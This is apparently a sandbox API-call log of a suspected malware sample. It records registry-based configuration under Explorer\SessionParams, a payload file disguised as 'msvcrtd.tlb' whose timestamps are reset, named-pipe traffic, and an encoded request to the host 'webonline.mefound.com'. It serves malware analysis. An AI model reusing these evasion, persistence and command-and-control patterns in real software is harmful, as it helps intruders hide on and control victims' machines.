GetLastError () returned 0x0 [0080.469] SetLastError (dwErrCode=0x0) [0080.469] GetComputerNameW (in: lpBuffer=0x172e340, nSize=0x172e320 | out: lpBuffer="CRH2YWU7", nSize=0x172e320) returned 1 [0080.469] _snwprintf (in: _Dest=0x172f1ec, _Count=0x104, _Format="\\\\.\\pipe\\%08x" | out: _Dest="\\\\.\\pipe\\c41b2304") returned 17 [0080.469] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e4ec | out: phkResult=0x72f1ed90*=0x14c, lpdwDisposition=0x172e4ec*=0x2) returned 0x0 [0080.469] RegQueryValueExA (in: hKey=0x14c, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x58) returned 0x0 [0080.469] RegQueryValueExA (in: hKey=0x14c, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x302d88, lpcbData=0x172e544*=0x58 | out: lpType=0x0, lpData=0x302d88*=0x88, lpcbData=0x172e544*=0x58) returned 0x0 [0080.469] RegCloseKey (hKey=0x14c) returned 0x0 [0080.469] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x14c, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0080.469] RegQueryValueExA (in: hKey=0x14c, lpValueName="Gdx", lpReserved=0x0, lpType=0x0, lpData=0x172e544, lpcbData=0x172e548*=0x4 | out: lpType=0x0, lpData=0x172e544*=0x0, lpcbData=0x172e548*=0x4) returned 0x0 [0080.470] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x15c, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0080.470] RegQueryValueExA (in: hKey=0x15c, lpValueName="FGcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0080.470] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e520 | out: phkResult=0x72f1ed90*=0x164, lpdwDisposition=0x172e520*=0x2) returned 0x0 [0080.470] RegSetValueExA (in: hKey=0x164, lpValueName="Gdx", Reserved=0x0, dwType=0x4, lpData=0x172e578*=0x0, cbData=0x4 | out: lpData=0x172e578*=0x0) returned 0x0 [0080.470] RegCloseKey (hKey=0x164) returned 0x0 [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.470] GetLastError () returned 0xcb [0080.470] SetLastError (dwErrCode=0xcb) [0080.471] GetLastError () returned 0xcb [0080.471] SetLastError (dwErrCode=0xcb) [0080.471] GetLastError () returned 0xcb [0080.471] SetLastError (dwErrCode=0xcb) [0080.471] GetLastError () returned 0xcb [0080.471] SetLastError (dwErrCode=0xcb) [0080.471] GetLastError () returned 0xcb [0080.471] SetLastError (dwErrCode=0xcb) [0080.471] GetLastError () returned 0xcb [0080.471] SetLastError (dwErrCode=0xcb) [0080.471] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.471] GetFileType (hFile=0x164) returned 0x1 [0080.471] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3ec | out: lpSystemTimeAsFileTime=0x172c3ec*(dwLowDateTime=0xfd5cb210, dwHighDateTime=0x1d3dfba)) [0080.471] GetLastError () returned 0xb7 [0080.471] SetLastError (dwErrCode=0xb7) [0080.471] GetLastError () returned 0xb7 [0080.471] SetLastError (dwErrCode=0xb7) [0080.471] GetLastError () returned 0xb7 [0080.471] SetLastError (dwErrCode=0xb7) [0080.471] CloseHandle (hObject=0x164) returned 1 [0080.471] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.471] SetFileTime (hFile=0x164, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0080.471] CloseHandle (hObject=0x164) returned 1 [0080.471] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0080.472] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x168 [0080.472] SetNamedPipeHandleState (hNamedPipe=0x164, lpMode=0x172e524, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0080.472] GetTickCount () returned 0x22dc3 [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] GetLastError () returned 0x0 [0080.472] SetLastError (dwErrCode=0x0) [0080.472] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2ac, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0080.472] GetFileType (hFile=0x16c) returned 0x1 [0080.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3d8 | out: lpSystemTimeAsFileTime=0x172c3d8*(dwLowDateTime=0xfd5cb210, dwHighDateTime=0x1d3dfba)) [0080.472] GetLastError () returned 0xb7 [0080.472] SetLastError (dwErrCode=0xb7) [0080.472] GetLastError () returned 0xb7 [0080.473] SetLastError (dwErrCode=0xb7) [0080.473] GetLastError () returned 0xb7 [0080.473] SetLastError (dwErrCode=0xb7) [0080.473] CloseHandle (hObject=0x16c) returned 1 [0080.473] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0080.473] SetFileTime (hFile=0x16c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0080.473] CloseHandle (hObject=0x16c) returned 1 [0080.473] strlen (_Str="webonline.mefound.com") returned 0x15 [0080.473] strlen (_Str="index/index.php?h=8NavN1UHP1o%3d&d=8Naq1O4ZqFrw16AGYzEOb8jkmgBlNA9uwOavN1UHP1rw1q83VQd%3d") returned 0x59 [0080.473] WriteFile (in: hFile=0x164, lpBuffer=0x31fd30*, nNumberOfBytesToWrite=0x84, lpNumberOfBytesWritten=0x172e4f8, lpOverlapped=0x311230 | out: lpBuffer=0x31fd30*, lpNumberOfBytesWritten=0x172e4f8*=0x84, lpOverlapped=0x311230) returned 1 [0080.473] ReadFile (in: hFile=0x164, lpBuffer=0x171e538, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x171e534, lpOverlapped=0x311230 | out: lpBuffer=0x171e538*, lpNumberOfBytesRead=0x171e534*=0xd, lpOverlapped=0x311230) returned 1 [0082.135] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0x7a120) returned 0x0 [0082.135] GetOverlappedResult (in: hFile=0x164, lpOverlapped=0x311230, lpNumberOfBytesTransferred=0x171e534, bWait=0 | out: lpNumberOfBytesTransferred=0x171e534) returned 1 [0082.135] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0082.135] GetFileType (hFile=0x174) returned 0x1 [0082.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0xfe5b6530, dwHighDateTime=0x1d3dfba)) [0082.135] GetLastError () returned 0xb7 [0082.135] SetLastError (dwErrCode=0xb7) [0082.135] GetLastError () returned 0xb7 [0082.135] SetLastError (dwErrCode=0xb7) [0082.135] GetLastError () returned 0xb7 [0082.135] SetLastError (dwErrCode=0xb7) [0082.136] CloseHandle (hObject=0x174) returned 1 [0082.136] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0082.136] SetFileTime (hFile=0x174, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0082.137] CloseHandle (hObject=0x174) returned 1 [0082.137] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x174, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0082.137] RegSetValueExA (in: hKey=0x174, lpValueName="FGcnt", Reserved=0x0, dwType=0x4, lpData=0x172e540*=0x0, cbData=0x4 | out: lpData=0x172e540*=0x0) returned 0x0 [0082.137] RegCloseKey (hKey=0x174) returned 0x0 [0082.137] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x174, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0082.137] RegQueryValueExA (in: hKey=0x174, lpValueName="FGcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0082.137] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0082.137] GetFileType (hFile=0x178) returned 0x1 [0082.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0xfe5b6530, dwHighDateTime=0x1d3dfba)) [0082.137] GetLastError () returned 0xb7 [0082.137] SetLastError (dwErrCode=0xb7) [0082.137] GetLastError () returned 0xb7 [0082.137] SetLastError (dwErrCode=0xb7) [0082.137] GetLastError () returned 0xb7 [0082.137] SetLastError (dwErrCode=0xb7) [0082.137] CloseHandle (hObject=0x178) returned 1 [0082.138] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0082.138] SetFileTime (hFile=0x178, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0082.138] CloseHandle (hObject=0x178) returned 1 [0082.138] CloseHandle (hObject=0x164) returned 1 [0082.138] CloseHandle (hObject=0x168) returned 1 [0082.138] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xea60) returned 0x0 [0082.138] GetLastError () returned 0x0 [0082.138] wsprintfA (in: param_1=0x172ebbc, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0082.138] wsprintfA (in: param_1=0x172e974, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\78f5d1ae4590aa11.tmp") returned 57 [0082.138] lstrlenA (lpString="olestdmp.ocx") returned 12 [0082.138] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x172e974 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0082.138] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpString2="\\" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" [0082.138] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0082.138] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6F") returned 2 [0082.138] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned 37 [0082.138] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F" [0082.138] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6C") returned 2 [0082.138] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned 39 [0082.138] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F", lpString2="6C" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C" [0082.138] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="65") returned 2 [0082.138] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned 41 [0082.138] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C", lpString2="65" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65" [0082.138] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="73") returned 2 [0082.138] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned 43 [0082.138] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65", lpString2="73" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573" [0082.138] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="74") returned 2 [0082.138] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned 45 [0082.138] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573", lpString2="74" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374" [0082.138] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="64") returned 2 [0082.138] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned 47 [0082.138] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374", lpString2="64" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464" [0082.138] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6D") returned 2 [0082.138] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned 49 [0082.138] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464", lpString2="6D" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D" [0082.139] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="70") returned 2 [0082.139] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned 51 [0082.139] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D", lpString2="70" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70" [0082.139] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="2E") returned 2 [0082.139] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned 53 [0082.139] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70", lpString2="2E" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E" [0082.139] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6F") returned 2 [0082.139] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned 55 [0082.139] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F" [0082.139] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="63") returned 2 [0082.139] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned 57 [0082.139] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F", lpString2="63" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63" [0082.139] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="78") returned 2 [0082.139] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned 59 [0082.139] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63", lpString2="78" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378" [0082.139] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned 61 [0082.139] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378", lpString2="FF.tmp" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" [0082.139] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", lpFindFileData=0x172ea7c | out: lpFindFileData=0x172ea7c) returned 0x35abe0 [0082.139] FindClose (in: hFindFile=0x35abe0 | out: hFindFile=0x35abe0) returned 1 [0082.139] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned 67 [0082.139] wsprintfA (in: param_1=0x172e838, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned 67 [0082.139] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0082.139] GetFileSize (in: hFile=0x168, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfa4 [0082.139] CloseHandle (hObject=0x168) returned 1 [0082.139] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", lpFindFileData=0x172ea7c | out: lpFindFileData=0x172ea7c) returned 0x35abe0 [0082.139] FindClose (in: hFindFile=0x35abe0 | out: hFindFile=0x35abe0) returned 1 [0082.139] GetLocalTime (in: lpSystemTime=0x172e7b4 | out: lpSystemTime=0x172e7b4*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1d, wHour=0xb, wMinute=0x7, wSecond=0xe, wMilliseconds=0x333)) [0082.139] GetLastError () returned 0x0 [0082.139] SetLastError (dwErrCode=0x0) [0082.139] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e4ec | out: phkResult=0x72f1ed90*=0x168, lpdwDisposition=0x172e4ec*=0x2) returned 0x0 [0082.140] RegQueryValueExA (in: hKey=0x168, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x5c) returned 0x0 [0082.140] RegQueryValueExA (in: hKey=0x168, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x302d88, lpcbData=0x172e544*=0x5c | out: lpType=0x0, lpData=0x302d88*=0x9a, lpcbData=0x172e544*=0x5c) returned 0x0 [0082.140] RegCloseKey (hKey=0x168) returned 0x0 [0082.140] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x168, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0082.140] RegQueryValueExA (in: hKey=0x168, lpValueName="Pdx", lpReserved=0x0, lpType=0x0, lpData=0x172e544, lpcbData=0x172e548*=0x4 | out: lpType=0x0, lpData=0x172e544*=0x0, lpcbData=0x172e548*=0x4) returned 0x0 [0082.140] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x164, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0082.140] RegQueryValueExA (in: hKey=0x164, lpValueName="FPcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0082.140] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e514 | out: phkResult=0x72f1ed90*=0x178, lpdwDisposition=0x172e514*=0x2) returned 0x0 [0082.140] RegSetValueExA (in: hKey=0x178, lpValueName="Pdx", Reserved=0x0, dwType=0x4, lpData=0x172e548*=0x0, cbData=0x4 | out: lpData=0x172e548*=0x0) returned 0x0 [0082.140] RegCloseKey (hKey=0x178) returned 0x0 [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] SetLastError (dwErrCode=0x0) [0082.140] GetLastError () returned 0x0 [0082.140] 